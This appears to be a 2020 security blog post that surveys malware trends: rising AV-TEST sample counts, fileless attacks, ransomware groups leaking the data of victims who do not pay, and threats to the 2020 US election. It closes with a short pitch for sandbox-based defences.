Malware closed out 2019 on a strong note. According to AV-TEST, malware authors’ efforts throughout the year helped push the total number of known malware above one billion samples. This development wouldn’t have been possible without the vigor exhibited by malware authors in the fall of 2019. Indeed, after detecting 8.5 million new samples in June and 9.56 million specimens the following month, AV-TEST saw the monthly totals jump up above 13 million in August. This monthly rate of detection has not faltered at the time of writing. After peaking in September with 17.70 million, it’s actually remained above 15 million with the exception of October at 13.52 million samples.
AV-TEST’s findings paint a picture of a threat landscape flooded with malware. While threat actors can use these samples to get up to trouble in any old way, it’s likely that more and more criminals will flock to certain channels rather than others over the coming year. Here are three such trends that organizations should keep an eye on in 2020.
1. Fileless Attacks Will Continue to Become More Commonplace
We have two main reasons to anticipate that fileless malware attacks will become more commonplace in 2020. First, the security community observed an increase in fileless attacks over the previous year. Trend Micro noted in September 2019 that detections of fileless attacks across H1 2019 had increased by 265 percent over the previous year, for instance. A few months later, Bleeping Computer reported that threat actors had begun abusing the Remote Desktop Protocol (RDP) as a new technique to target organizations with fileless malware attacks. Nefarious individuals will likely continue to come up with other tactics in the coming months.
Second, security researchers tracked more categories of digital threats beginning to incorporate fileless techniques into their attack chains. For instance, Malwarebytes revealed in November 2019 that a growing number of exploit kits had begun using fileless attacks instead of dropping their payloads onto a disk. Researchers have also spotted threat actors pairing fileless tactics with SOREBRECT, GandCrab, FTCODE and other ransomware families over the past few years. In an effort to evade detection by signature-based tools, malware authors will likely continue to incorporate these types of capabilities into their creations.
2. More Ransomware Families Will Begin Doxing Victims
Ransomware is bad enough when it encrypts a victim’s data and demands a ransom payment in exchange for the decryption key. Not all ransomware families stop there, however. Some families have specifically begun punishing users who don’t fulfill their ransom demands.
Maze was the ransomware family to institute this change. In November 2019, Bleeping Computer revealed that the Maze group had published approximately 700 MB of data stolen from Allied Universal. The group said that this information amounted to about 10% of the files stolen from the facility services company. It also stated that it would release the rest if it didn’t receive a ransom payment.
In publishing Allied Universal’s data online, the Maze group apparently inspired other ransomware families to follow suit. Sodinokibi took the lead by leaking 337 MB of data stolen from Artech Information Systems in early January 2020. Just a few days later, news emerged of Nemty and its plans to create a website on which it would begin leaking non-paying victims’ information. That was about a week or so before the security community learned of BitPyLock authors’ threats to begin leaking their victims’ files.
It stands to reason that even more ransomware families will use this information-stealing technique—or at least threaten to do so—as the year progresses.
3. Persistent Security Threats for the Upcoming U.S. Election
Infosec professionals and election security officials alike are concerned about the security of the 2020 U.S. presidential election. As reported by TechCrunch, Valimail examined the largest three electoral districts in each U.S. state to evaluate their defenses against email spoofing attacks. The digital security solutions provider found that admins had protected just 10 of the 187 election-related domains with DMARC, a protocol useful for validating a sender’s authenticity. Without this type of protection, threat actors can trick election officials into opening a malicious file attachment or visiting a suspicious website.
The Cybersecurity Infrastructure Security Agency (CISA) is concerned about this possibility. In particular, it’s worried that malicious actors could use ransomware to lock up and/or destroy states’ voter registration databases. That explains why CISA announced its intention in August 2019 to create a program for helping states protect those databases.
“Recent history has shown that state and county governments and those who support them are targets for ransomware attacks,” said CISA Director Christopher Krebs, as quoted by Reuters. “That is why we are working alongside election officials and their private sector partners to help protect their databases and respond to possible ransomware attacks.”
Beyond that, malicious actors will likely use interest around the election to conduct politically themed malware attacks. It happened back in 2016 with the CIA Election AntiCheat Control. In November 2019, Cisco Talos researchers observed something similar when it came across the “Donald Trump Screen of Death.” No doubt these types of attacks will continue.
Defending Against Malware in 2020
The trends discussed above highlight the need for organizations to defend themselves against a malware infection. They can do so by investing in a solution that both provides detailed reports about relevant system changes and uses VM sandboxing to examine questionable file behavior.